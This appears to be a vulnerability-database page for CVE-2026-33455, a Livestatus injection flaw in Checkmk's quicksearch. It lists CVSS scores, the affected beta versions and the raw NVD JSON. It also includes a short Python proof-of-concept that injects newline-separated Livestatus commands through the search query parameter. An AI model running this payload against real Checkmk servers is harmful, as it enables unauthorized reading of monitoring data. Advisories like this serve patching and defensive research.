Security Vulnerability Report
CVE-2026-33455 CVSS 6.3 MEDIUM

CVE-2026-33455

Published: 2026-04-10 09:16:23
Last Modified: 2026-04-20 17:10:27

Description

Livestatus injection in the monitoring quicksearch in Checkmk <2.5.0b4 allows an authenticated attacker to inject livestatus commands via the search query due to insufficient input sanitization in search filter plugins.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:checkmk:checkmk:2.5.0:b1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:checkmk:checkmk:2.5.0:b2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:checkmk:checkmk:2.5.0:b3:*:*:*:*:*:* - VULNERABLE
Checkmk < 2.5.0b4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target configuration
target_url = "http://target-checkmk-server/checkmk/api/1.0/domain-types/quicksearch/collections/all"
username = "low_priv_user"
password = "password"

# Livestatus injection payload
# The payload attempts to inject a new line and a command to list columns
# exploiting the insufficient input sanitization in the quicksearch.
payload = "test\nColumns: host_name description\n"

params = {
    "q": payload  # Injecting payload into the search query
}

try:
    # Sending the request with authentication
    response = requests.get(target_url, params=params, auth=(username, password), verify=False)
    if response.status_code == 200:
        print("[+] Potential exploitation successful!")
        print("[+] Response content:")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

References

https://checkmk.com/werk/17988 (Vendor Advisory)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33455", "sourceIdentifier": "[email protected]", "published": "2026-04-10T09:16:23.447", "lastModified": "2026-04-20T17:10:27.397", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Livestatus injection in the monitoring quicksearch in Checkmk <2.5.0b4 allows an authenticated attacker to inject livestatus commands via the search query due to insufficient input sanitization in search filter plugins."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-140"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.5.0:b1:*:*:*:*:*:*", "matchCriteriaId": "F8943BB3-1487-494C-B4EB-89EB0B18B6A2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.5.0:b2:*:*:*:*:*:*", "matchCriteriaId": "5342045D-CB9F-4663-9538-8B657C9AC833"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.5.0:b3:*:*:*:*:*:*", "matchCriteriaId": "E9566834-D4EE-4104-AD60-7988FCF17224"}]}]}], "references": [{"url": "https://checkmk.com/werk/17988", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}